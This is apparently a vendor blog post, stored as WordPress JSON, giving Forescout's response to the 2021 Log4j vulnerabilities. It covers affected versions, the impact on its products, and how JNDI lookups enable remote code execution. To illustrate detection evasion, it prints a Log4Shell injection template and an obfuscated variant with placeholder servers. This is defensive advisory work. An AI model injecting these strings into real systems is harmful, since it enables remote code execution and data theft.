{"id":69985,"date":"2021-12-12T18:19:35","date_gmt":"2021-12-13T02:19:35","guid":{"rendered":"https:\/\/forescoutstage.wpengine.com\/?p=69985"},"modified":"2021-12-29T15:29:01","modified_gmt":"2021-12-29T23:29:01","slug":"forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2","status":"publish","type":"post","link":"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/","title":{"rendered":"Forescout\u2019s Response to Apache Log4j Vulnerabilities"},"content":{"rendered":"

Update as of December 29, 2021:<\/strong><\/p>\n

On December 28, 2021, Apache disclosed a new vulnerability (CVE-2021-44832). This is a medium severity vulnerability (CVSS score: 6.6) that allows for remote code execution (RCE) in Apache Log4j2 versions 2.0-beta7 through 2.17.0, excluding security fix releases 2.3.2 and 2.12.4. Apache released Log4j2 versions 2.17.1, 2.12.4, and 2.3.2 to patch the vulnerability and resolve the issue.<\/p>\n

For the latest information on how to update your Forescout products, please refer to\u00a0KB Article #12049<\/a> on our portal.<\/p>\n

For more information: Apache CVE: CVE-2021-44832<\/a><\/p>\n

On December 9, 2021, Apache published a zero-day vulnerability\u00a0(CVE-2021-44228)<\/a>\u00a0for Apache Log4j being referred to as \u201cLog4Shell\u201d. This \u201ccritical\u201d vulnerability (CVSS score: 10) allows a remote attacker to take control of an affected system. When exploited, this vulnerability allows an attacker to run arbitrary code on the device, giving full control over to the attacker. Any device exploited should be considered compromised, potentially along with any devices that trusted the compromised device. The vulnerability has been actively exploited.<\/p>\n

On December 14, 2021, Apache confirmed another vulnerability that was identified impacting Apache Log4j utility (CVE-2021-45046). According to reports, this flaw (CVSS score: 9) could result in remote code execution, which stemmed from an “incomplete” fix for\u00a0CVE-2021-44228<\/a>. Vulnerability CVE-2021-45046 has been actively exploited.<\/p>\n

On December 18, 2021, a third vulnerability was identified. Tracked as\u00a0CVE-2021-45105\u00a0(CVSS score: 7.5), the high severity Denial of Service (DoS) vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0.<\/p>\n

For additional details about these vulnerabilities, affected versions and solutions, please reference the\u00a0Apache Logging Services alert<\/a>.<\/p>\n

Impact on Forescout Products and Services<\/h2>\n

Forescout\u2019s security team immediately commenced an investigation of its networks and has found no evidence of compromise at this time. Forescout has updated rules and signatures of Forescout\u2019s security solutions to detect and block any attempt to exploit our platforms and keep our defenders on high alert. In addition, Forescout has identified potentially vulnerable services and is in the process of patching them.<\/p>\n

Forescout has identified the affected products and components and is in the process of releasing updates for the customers. For the latest information on how to update your Forescout products, please refer to\u00a0KB Article #12049<\/a> on our portal.<\/p>\n

Why are these Vulnerabilities Challenging?<\/h2>\n

Log4j is a logging library present in many Java applications and the vulnerabilities are a consequence of how Log4j processes log messages.<\/p>\n

It allows the use of \u201clookup\u201d features, where the user providing messages to be logged can specify variables that will be \u201clooked up\u201d via Log4j and appended into the message. Instead of a simple string, for instance, it can be a system or environment variable, or a call to a remote server. That allows attackers to inject calls to malicious servers that hosts malware or an instruction to leak sensitive information (such as access tokens) to attacker-controlled servers.<\/p>\n

These remote calls are enabled by a Java feature called Java Naming and Directory Interface (JNDI), which supports protocols such as the Lightweight Directory Access Protocol (LDAP), Domain Name System (DNS), Remote Method Invocation (RMI), and Common Object Request Broker Architecture (CORBA). Technically, an exploit is a string of the form ${jndi:<service>:<malicious_server>} that must be injected by an attacker into a vulnerable log4j instance.<\/p>\n

Many Internet-facing machines, such as web servers, accept user input that is logged by a backend running Log4j without sanitization. That happens often even if the webserver itself does not run Log4j, but some business application uses information coming from the user via the webserver. This allows attackers to inject the malicious strings via HTTP requests, for instance, which is the biggest attack surface observed so far.<\/p>\n

There are three complicating factors for this vulnerability. First, Log4j is not a single vulnerable application but a widely-used component<\/a>, present in products ranging from databases<\/a> to web conferencing systems<\/a>. Therefore, identifying vulnerable assets in a network is challenging<\/strong>. Second, attackers have quickly found many ways to obfuscate exploits, so that understanding if and how your organization is or was attacked is not easy<\/strong>. For instance, one valid exploit is ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}:\/\/<malicious_server>} which is not easy to immediately match to the ${jndi:<service>:<malicious_server>} template we mentioned above.<\/p>\n

The third complication lies in an incomplete fix for CVE-2021-44228. There have been two new vulnerabilities discovered: CVE-2021-45046 and CVE-2021-45105.<\/p>\n

While the fix for CVE-2021-44228 disables JNDI for log messages, the variables used in the Log4j configuration files still could be expanded to JNDI lookups. Initially CVE-2021-45046 had a low CVSS score of 3.7 since it has been believed that the impact of this vulnerability is at most Denial-of-Service, and that the attackers must be able to control the configuration files. However, on some systems (MacOS at the time of this writing) researchers have discovered a bypass<\/a> that allows to achieve full Remote Code Execution.<\/p>\n

We have already hinted about the last of the discovered vulnerabilities CVE-2021-45105 in Forescout Research Labs technical blog<\/a>. This vulnerability allows attackers to achieve Denial-of-Service on certain systems by adding specially crafted log variables that lead to infinite recursions and will cause stack overflows.<\/p>\n

The root cause of all these three vulnerabilities is not only the fact that JNDI lookups were allowed without restriction, but chiefly because the variable parsing functionality is flawed. Thus, all three patches are mending the same fundamental issue. Yet, it may still be possible that researchers or attackers will soon discover new ways of circumventing these patches as well. It is therefore imperative to update your system to the latest patch available as soon as that patch gets out<\/strong>.<\/p>\n

Refer to our technical blog<\/a> for more insights on detecting vulnerable systems and exploitation attempts.<\/p>\n

Protecting Your Network \u2013 Mitigations<\/h2>\n

Identify Vulnerable Devices<\/h3>\n

Vulnerable software\/devices can be identified by:<\/strong><\/p>\n